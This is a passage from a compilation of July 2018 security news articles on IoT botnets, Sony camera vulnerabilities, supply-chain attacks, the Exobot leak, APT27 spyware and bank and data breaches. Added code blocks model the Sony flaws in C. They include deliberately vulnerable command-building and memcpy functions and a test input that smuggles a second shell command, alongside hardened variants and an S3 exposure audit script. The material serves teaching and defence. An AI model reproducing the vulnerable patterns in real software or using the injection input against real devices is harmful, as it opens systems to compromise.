The attacks were targeting nearly all the same exploits as the first campaign, along with the brute-forcing attempts observed as part of the second campaign, but also started using a D-Link DSL-2750B OS command injection exploit.

One of the effects of these new campaigns was a surge in attacks targeting Small-Office/Home Office (SOHO) network devices manufactured by Dasan and D-Link, as eSentire alerted. According to the security firm, over 3000 source IPs were involved in the attack, but all were coordinated by a single-source command.

As Palo Alto Networks points out, the new attacks prove once again how attackers can build large botnets consisting of different types of devices and control them from a single C&C server.

“This is exacerbated by the speed of exploitation in the wild of newly released vulnerabilities and also highlights the need for security vendor reactivity in response to these disclosures, applicable to the subset of these devices that do fall under the protection of security devices,” the security firm concludes.


Sony Patches Remotely Exploitable Vulnerabilities in Network Cameras
23.7.2018 securityweek Vulnerability

Two serious, remotely exploitable vulnerabilities in Sony IPELA E Series Network Camera products could allow attackers to execute commands or arbitrary code on affected devices.

Tracked as CVE-2018-3937, the first of the vulnerabilities is a command injection flaw in the measurementBitrateExec functionality of the IPELA E Series Network Camera. These are network facing devices used for monitoring and surveillance.

The issue was discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos, who explain that arbitrary commands could be executed via a specially crafted GET request. An attacker looking to trigger the vulnerability would only need to send a single HTTP request.

“While parsing the input measurement string, there isn't a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address,” the researchers explain.
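The unchecked server address described above, as an added example that is not Cisco Talos' or Sony's code: a model of the -c parsing (the measurement string format "-c <host> -t <seconds>" and the "measure" binary are assumed) that contrasts dropping the raw value into a shell command line with validating it against an allow-list and passing it as a single argv element, so no shell ever interprets it.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_MAX 253   /* longest valid DNS name */

/* Extract the value following "-c" from a measurement string such as
 * "-c 10.0.0.5 -t 10" (format assumed; the real IPELA format is not given
 * in the article). Returns 1 on success, 0 if -c is absent or too long. */
int parse_server_arg(const char *input, char *host, size_t hostlen)
{
    const char *p = strstr(input, "-c ");
    if (!p) return 0;
    p += 3;
    while (*p == ' ') p++;
    size_t n = strcspn(p, " ");           /* value ends at the next blank */
    if (n == 0 || n >= hostlen) return 0;
    memcpy(host, p, n);
    host[n] = '\0';
    return 1;
}

/* Vulnerable pattern: the raw value lands inside a shell command line, so
 * anything the shell treats specially (";", "`", "$(...)") is interpreted.
 * Kept only to show what the unchecked path produces; never pass it to system(). */
int build_shell_cmd_unchecked(const char *server, char *cmd, size_t cmdlen)
{
    int n = snprintf(cmd, cmdlen, "measure -c %s", server);
    return (n >= 0 && (size_t)n < cmdlen) ? 0 : -1;
}

/* Allow-list check: hostname or IPv4 literal characters only. A leading '-'
 * is rejected so the value cannot be mistaken for another option. */
int is_valid_host(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > HOST_MAX) return 0;
    if (s[0] == '-' || s[0] == '.') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '-' && c != '.') return 0;
    }
    return 1;
}

/* Hardened path: validate, then build an argv for execvp()/posix_spawn().
 * Each argument stays one argv element, so no shell parses it.
 * Returns the argument count, or -1 if the host fails validation. */
int build_measure_argv(const char *server, const char *argv[], size_t maxargs)
{
    if (maxargs < 4 || !is_valid_host(server)) return -1;
    argv[0] = "measure";
    argv[1] = "-c";
    argv[2] = server;
    argv[3] = NULL;
    return 3;
}

int main(void)
{
    char host[HOST_MAX + 1], cmd[512];
    const char *argv[4];
    /* Constructed inputs: a benign one and one carrying a shell metacharacter */
    const char *inputs[] = { "-c 10.0.0.5 -t 10", "-c 10.0.0.5;id -t 10" };
    for (int i = 0; i < 2; i++) {
        if (!parse_server_arg(inputs[i], host, sizeof host)) continue;
        build_shell_cmd_unchecked(host, cmd, sizeof cmd);
        printf("unchecked command : %s\n", cmd);
        printf("validated         : %s\n",
               build_measure_argv(host, argv, 4) < 0 ? "rejected" : "accepted");
    }
    return 0;
}
```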

The second vulnerability is tracked as CVE-2018-3938 and affects the 802dot1xclientcert.cgi functionality of IPELA E Series Camera devices.

“A specially crafted POST can cause a stack-based buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability,” Cisco says.

The 802dot1xclientcert.cgi endpoint, the security researchers explain, is “designed to handle everything related to certificate management for 802.1x.”

When data is received, certain checks are performed and the data is then directly copied to a local buffer via memcpy. However, because the strlen length is not checked against a safe value, a stack-based buffer overflow occurs and an attacker can abuse it to remotely execute commands on the device.
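The memcpy pattern described above, as an added example that is not the camera firmware's code: a model of the 802dot1xclientcert.cgi copy in which the vulnerable variant sizes the copy by strlen of the request data, and the hardened variant bounds it by the destination size and the declared body length (the buffer size and the "cert=" body format are assumed).

```c
#include <stdio.h>
#include <string.h>

#define CERT_BUF 64   /* stack buffer size chosen for the model; the real size is unknown */

/* Vulnerable pattern (do not use): the copy length comes from strlen(src) alone.
 * With a stack buffer of CERT_BUF bytes, any body longer than that writes past
 * the buffer. Declared only for contrast; nothing here calls it. */
void store_cert_unchecked(const char *src)
{
    char cert[CERT_BUF];
    memcpy(cert, src, strlen(src));      /* no comparison with sizeof cert */
    (void)cert;
}

/* Hardened copy: the length is bounded by the destination before memcpy runs.
 * srclen comes from the request's Content-Length (or the parser), not strlen,
 * so bodies that are not NUL-terminated or contain embedded NULs are handled.
 * Returns bytes copied, or -1 when the data would not fit (room for NUL kept). */
int store_cert_checked(char *dst, size_t dstlen, const char *src, size_t srclen)
{
    if (dstlen == 0 || srclen >= dstlen) return -1;
    memcpy(dst, src, srclen);
    dst[srclen] = '\0';
    return (int)srclen;
}

/* Minimal model of the POST handler: body is "cert=<data>" (format assumed).
 * Returns bytes stored, 0 if the field is absent, -1 if rejected as oversized. */
int handle_cert_post(const char *body, size_t bodylen, char *out, size_t outlen)
{
    const char *key = "cert=";
    size_t klen = strlen(key);
    if (bodylen < klen || memcmp(body, key, klen) != 0) return 0;
    return store_cert_checked(out, outlen, body + klen, bodylen - klen);
}

int main(void)
{
    char out[CERT_BUF];
    /* Constructed bodies: one that fits and one the size of a 2 KB POST */
    const char *small = "cert=MIIBIjANBgkq";
    char big[2048];
    memset(big, 'A', sizeof big);
    memcpy(big, "cert=", 5);
    printf("small body: %d bytes stored\n", handle_cert_post(small, strlen(small), out, sizeof out));
    printf("big body  : %d (rejected)\n", handle_cert_post(big, sizeof big, out, sizeof out));
    return 0;
}
```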

Both vulnerabilities were reported to Sony last month. Both issues, which carry a CVSS score of 9.1, were found in Sony IPELA E series G5 firmware 1.87.00. Sony released an update last week to address the security bugs.


Software Supply Chain Increasingly Targeted in Attacks: Survey
23.7.2018 securityweek Hacking

Organizations increasingly have to deal with cyberattacks targeting the software supply chain and in many cases they are not adequately prepared to respond to such incidents, according to a report published on Monday by endpoint security firm CrowdStrike.

In supply chain attacks, malicious actors target software makers in an effort to modify their products so that they perform malicious actions or provide a backdoor into the targeted environment.

The NotPetya attack, which involved a Ukrainian tax software firm, and the CCleaner incident, which involved hacking of distribution servers at Piriform, are some of the most well-known examples, but supply chain attacks are becoming increasingly common.

Vanson Bourne, on behalf of CrowdStrike, surveyed 1,300 senior IT decision makers and security professionals in the U.S., Canada, Mexico, the U.K., Australia, Japan, Germany and Singapore in April and May.

The Securing the Supply Chain report shows that roughly one-third of organizations are concerned about supply chain attacks, with 18% and 38% saying that the risk is high and moderate, respectively.

Approximately two-thirds of respondents have experienced some form of supply chain attack. The biotechnology and pharmaceutical sector takes the lead with 82% of organizations encountering such an incident, including 45% being hit in the last 12 months. Other sectors more likely to encounter supply chain attacks include hospitality, entertainment and media (74%), IT and technology (74%), engineering (73%), healthcare (70%) and insurance (68%).


On average, organizations believe it would take them 10 hours to detect an incident, 13 hours to react, 15 hours to respond, and 25 hours to remediate it, which totals 63 hours, the report shows.

A vast majority of respondents that have encountered a supply chain incident reported a financial impact, with an average cost of roughly $1.1 million. The highest costs were reported by the hospitality, entertainment and media sector ($1.44 million) and the lowest in the government sector ($329,000).

Some companies have also paid a ransom to recover from a supply chain attack, with many respondents saying their own organization or others in their industry had paid.

In addition to financial loss, organizations experienced various types of drawbacks following an attack, including the necessity to completely rebuild IT systems (36%), spend more on security (36%), and service/operations disruption (34%).

When it comes to response strategies, over one-third of respondents said they had a comprehensive strategy in place when they suffered an attack and more than half had some level of response pre-planned.

Trust in suppliers is not very high, with only 35% of respondents saying they had been totally certain they would be informed of a cybersecurity incident. On the other hand, 39% of those surveyed said they had lost trust in a supplier over the past year.

Less than a third of the organizations that took part in the survey vetted all suppliers in the past 12 months, and the high profile attacks that came to light last year made the vetting process more rigorous in 59% of cases. Executives have also started changing their attitude with regard to this threat, with 31% becoming more involved, 49% planning to become more involved, and 13% taking more of an interest.


The source code of the Exobot Android banking trojan has been leaked online
23.7.2018 securityaffairs Android

The source code of the Exobot Android banking trojan has been leaked online, researchers already verified its authenticity.
The source code of the Exobot Android banking trojan has been leaked online, and experts believe that we will soon see a new wave of attacks based on the malware.

The Exobot Android banking trojan was first spotted at the end of 2016 when its authors were advertising it on the dark web.

The authors advertised it as usable for phishing attacks, and it implements the features common to most banking Trojans, such as intercepting SMS messages.

Exobot is a powerful banking malware that is able to infect even smartphones running the latest Android versions.

In January, the authors decided to stop working on the malware and offered its source code for sale.

Now researchers from Bleeping Computer have confirmed that they received a copy of the source code from an unknown individual and shared it with malware researchers from ESET and ThreatFabric in order to verify its authenticity.
“The code proved to be version 2.5 of the Exobot banking trojan, also known as the “Trump Edition,” one of Exobot’s last versions before its original author gave up on its development,” reads a blog post published by Bleeping Computer.


According to experts from ThreatFabric the version provided to Bleeping Computer was leaked online in May. It seems that one of the users that purchased the malicious code decided to leak it online.

According to the experts, the source code for the Exobot Android banking Trojan is now being distributed on a few underground hacking forums. This means that threat actors can now build their own versions and also offer them under a malware-as-a-service model.

“In the coming months, we may see Android malware devs slowly migrating their campaigns from BankBot to Exobot, as few will decline a “free upgrade” to a better code,” concluded Bleeping Computer.


Experts believe US Cyber Command is the only entity that can carry out ‘hack backs’
23.7.2018 securityaffairs BigBrothers

The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector.
The U.S. government should carry out hack backs in retaliation for the massive attacks against organizations in the US private sector, and when appropriate the military’s hacking unit should hit back; this is what three experts said at a panel organized by APCO.

The three experts, with backgrounds in the private sector, the intelligence community and the military, agreed that private organizations hit by cyber attacks should delegate the response against the attackers to US Cyber Command.

“I think if it’s going to happen, it’s best in the hands of the government,” said Sean Weppner, chief strategy officer at NISOS Group and a former DOD cyber officer.

The experts highlighted that private companies lack the intelligence capabilities to attribute attacks to a specific threat actor and lack the offensive capabilities needed to conduct hack backs.

Private companies not only have no capabilities to conduct hack backs, they are not legally authorized to do it.

“The U.S. government should decide how to retaliate against the worst attacks on the country’s private sector, and when appropriate, the military’s hacking unit should hit back, three experts said Monday.” reported CyberScoop.

“The controversial idea entails taking the fight to nefarious actors by attacking their computer network in-kind, probing for exfiltrated data and employing measures to retrieve or destroy stolen information.”

Alex Bolling, the former chief of operations at the CIA’s Information Operations Center, addressed the problem of cyber attacks against critical infrastructure, which in most cases is owned by private entities.

The response to attacks against critical infrastructure operated by private organizations must be delegated to the US Government.

In the majority of cases, attacks against critical infrastructure are carried out by persistent attackers, and for this reason a response requires specific cyber skills, which US CYBERCOM has.

Speaking of CYBERCOM, Bolling said it is the “agency that is best resourced to respond to threats to [U.S.] national interests…[and] critical infrastructure in the energy, finance and wider commercial space.”


Private companies cannot carry out hack backs if we want to avoid a digital Wild West. A private company that decides to target its attackers is in any case a serious threat to the overall digital community.

“For one, companies venturing out into foreign networks would run the risk of disrupting existing U.S. intelligence or military operations.” continues CyberScoop.

According to Edward Amoroso, CEO of Tag Cyber, the US CYBERCOM should isolate the specific target to hit and attack it limiting the risk of any collateral damage.

“I’d like to think there’s a lot of human intelligence and spy-craft that provides a really good view” to the government, said Amoroso.

Experts also warn of the risk of hacking back a party that was not responsible, as a result of incorrect attribution of the attack.

Of course, every threat must be properly addressed, especially the ones that target the U.S. private sector daily. The three experts urge proper cyber hygiene to mitigate the risk of cyber attacks and limit the need to carry out hack backs.


CSE Malware ZLab – Chinese APT27’s long-term espionage campaign in Syria is still ongoing
23.7.2018 securityaffairs APT

Researchers at CSE Cybsec ZLab analyzed a malicious code involved in a long-term espionage campaign in Syria attributed to Chinese APT27 group.
A few days ago, the security researcher Lukas Stefanko from ESET discovered an open repository containing some Android applications.


The folder was found on a compromised website at the following URL:

hxxp://chatsecurelite.uk[.]to

This website is written in Arabic and, judging by a translation of its content, appears to offer a secure messaging app. The homepage shows how the application works and includes some slides about it.

Security researchers from CSE Cybsec Z-Lab analyzed the content of the folder and discovered an Android spyware that was developed to exfiltrate sensitive information from victims’ devices.

The malicious code was used to compromise entities in the area; the researchers discovered that it was part of the arsenal of a Chinese APT group tracked as APT27, aka Golden Rat Organization.

The APT27 group has focused its activity on Syria over the last couple of years, using both Windows and Android malware to compromise target devices. Its code is not particularly sophisticated, but the group’s activity is still ongoing.

Searching online, we found only one team that has tracked the activity of the APT27 group in Syria since 2016: researchers at 360 Threat Intelligence Center.

The analysis published by that team documented APT27’s activity in Syria; the code analyzed by the malware analysts at CSE Cybsec ZLab and the code dissected by 360 Threat Intelligence Center are almost identical.

The 360 Threat Intelligence Center report is dated 2017; the experts at CSE Cybsec collected evidence that the cyber espionage campaign is still ongoing and that the threat actor continues to improve its malicious code.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara rules, are available in the report published by the researchers at ZLab.


"MoneyTaker" Hackers Stole $1 Million From Russian Bank
22.7.2018 securityweek Incident

A cybercriminal group referred to as MoneyTaker recently managed to steal nearly $1 million from PIR Bank (Russia), according to cybercrime research firm Group-IB.

The theft was performed on July 3 through the Russian Central Bank’s Automated Workstation Client, an interbank system similar to SWIFT. The hackers managed to transfer the funds to 17 accounts at major Russian banks and then cashed them out.

After the incident, the cybercriminals also attempted to maintain persistence in the bank’s network, but were detected. While PIR staff was able to delay the withdrawal of some of the funds, it appears that most of what was stolen has been lost, namely around $920,000 (which is a conservative estimate, according to Group-IB).

Group-IB, which analyzed the incident, says that all evidence points to the MoneyTaker group orchestrating the theft. The investigators discovered tools and techniques previously associated with the group, along with the IP addresses of their command and control (C&C) servers.

The security firm previously reported that MoneyTaker had launched over 20 successful attacks against financial institutions and legal firms in the US, UK and Russia over the past two years. The group has been mainly focused on card processing systems, such as the AWS CBR (Russian Interbank System) and SWIFT (US).

The security researchers established that the attack on PIR Bank started in late May 2018 and that a compromised router at one of the bank’s regional branches was used as the entry point.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks,” the researchers say.

The hackers breached the bank’s main network and accessed the AWS CBR, then generated payment orders and sent money to mule accounts prepared in advance. Funds were transferred to accounts at 17 of the largest banks and were immediately cashed out by money mules via ATMs.

The bank employees discovered the unauthorized transactions with large sums on the evening of July 4 and asked the regulator to block the AWS CBR digital signature keys, but weren’t able to stop the financial transfers in time. Thus, the hackers managed to cash out most of the stolen money.

The attackers also cleared OS logs on compromised computers to hinder analysis. They also left reverse shells on the bank’s computers to conduct new attacks, but these were discovered during the investigation and removed.

Attacks on AWS CBR are not easy to implement, Valeriy Baulin, Head of Digital Forensics Lab Group-IB, says. Thus, such attacks are “not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully.”

“This is not the first successful attack on a Russian bank with money withdrawal since early 2018. We know of at least three similar incidents. A 2016 incident, when MoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind,” Baulin said.


Microsoft Addresses Serious Vulnerability in Translator Hub
22.7.2018 securityweek Vulnerability

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises to build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Mahmood also discovered that the request had no Cross-Site Request Forgery (CSRF) protection. This means that an attacker could exploit the CSRF vulnerability to impersonate a legitimate, logged-in user and perform actions on their behalf.

An attack scenario, he says, would require an attacker to know the ProjectID number of a logged-in victim. They could then include a URL in a page that issues the remove command; as soon as the victim visits that page, the request would be sent from their browser and the project removed.

Further analysis of the issue revealed an Insecure Direct Object Reference (IDOR) vulnerability, which could essentially allow an attacker to set any ProjectID in the HTTP project removal request and delete any of the projects in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.


Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
22.7.2018 securityweek ICS

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 2018 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S. federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has little real consequences beyond drawing yet more attention to the issue.

Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russian state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the widespread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around the world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our clients' security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc.) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach, ensuring that only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”


Robocalling Firm Exposes U.S. Voter Records
22.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and had already been indexed by the searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

The Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files, including audio files with pre-recorded political messages for robocalls (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robocent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and its files after being responsibly alerted to the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.
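The Robocent exposure came down to a bucket that anyone could list and read. The following is an added example (not code from the article, Kromtech or Robocent) of the check a defender would run over a bucket's ACL and bucket policy to spot that condition. The input dictionaries mirror the shapes that boto3's get_bucket_acl() and get_bucket_policy() return; the sample ACL and policy are constructed here so the audit runs offline without AWS credentials.

```python
"""Offline audit of an S3 bucket's ACL grants and bucket policy for public access.

Added example, not code from the article, Kromtech or Robocent. Inputs mirror the
shapes returned by boto3's get_bucket_acl() / get_bucket_policy(); the sample data
below is constructed so the check runs without AWS credentials.
"""
import json

# Canned grantee URIs AWS uses for "everyone" and "any AWS account holder".
PUBLIC_GRANTEE_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def public_acl_grants(acl):
    """Return [(grantee_uri, permission)] for grants to AllUsers/AuthenticatedUsers."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GRANTEE_URIS:
            findings.append((grantee["URI"], grant["Permission"]))
    return findings


def _principal_is_public(principal):
    # Principal may be "*" or {"AWS": "*"} / {"AWS": ["*", ...]}.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        aws = [aws] if isinstance(aws, str) else aws
        return "*" in aws
    return False


def public_policy_statements(policy_document):
    """Return Sids (or positional labels) of unconditional Allow statements open to everyone.

    Statements carrying a Condition are skipped here; they need case-by-case review."""
    policy = json.loads(policy_document) if isinstance(policy_document, str) else policy_document
    statements = policy.get("Statement", [])
    statements = [statements] if isinstance(statements, dict) else statements
    findings = []
    for idx, stmt in enumerate(statements):
        if (stmt.get("Effect") == "Allow" and _principal_is_public(stmt.get("Principal"))
                and not stmt.get("Condition")):
            findings.append(stmt.get("Sid", f"statement-{idx}"))
    return findings


def audit_bucket(acl, policy_document=None):
    """Summarise whether a bucket is reachable without AWS credentials."""
    acl_hits = public_acl_grants(acl)
    policy_hits = public_policy_statements(policy_document) if policy_document else []
    return {"public": bool(acl_hits or policy_hits),
            "acl_grants": acl_hits, "policy_statements": policy_hits}


# Constructed sample: an ACL granting READ to everyone, i.e. a world-listable bucket.
SAMPLE_ACL = {
    "Owner": {"ID": "EXAMPLE-OWNER-ID"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-ID"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}

# Constructed sample: a policy that makes every object readable by anyone.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}],
})

if __name__ == "__main__":
    print(audit_bucket(SAMPLE_ACL, SAMPLE_POLICY))
```

Either finding alone is enough to make the bucket's contents world-readable; in practice the account-level Block Public Access setting is the control that stops both misconfigurations from taking effect in the first place.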


HR Services Firm ComplyRight Suffers Data Breach
22.7.2018 securityweek Incident

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.

However, ComplyRight says the data breach has impacted less than 10 percent of the individuals whose tax forms have been prepared on its platform.

An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 2018 and May 22, 2018.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.


Adobe Patches Vulnerability Affecting Internal Systems
22.7.2018 securityweek Vulnerability

Adobe has patched what researchers describe as a potentially serious security issue in its internal systems, but the company has downplayed the impact of the vulnerability.

White hat hackers at Germany-based security research firm Vulnerability Lab claim to have discovered that code submitted through some of Adobe’s event marketing registration forms ultimately made its way to one of the company’s main databases, from where it propagated to emails and web services.

Adobe told SecurityWeek that the issue was a cross-site scripting (XSS) bug in a form used for event marketing registration and said a fix had been implemented. If Adobe’s classification of the flaw is accurate, it was likely a persistent XSS.

Vulnerability Lab told SecurityWeek that it analyzed the issue between November 2017 and February 2018, when it reported its findings to the vendor. The company claims it took until May for Adobe to identify the cause of the problem, with a patch being implemented in mid-June.

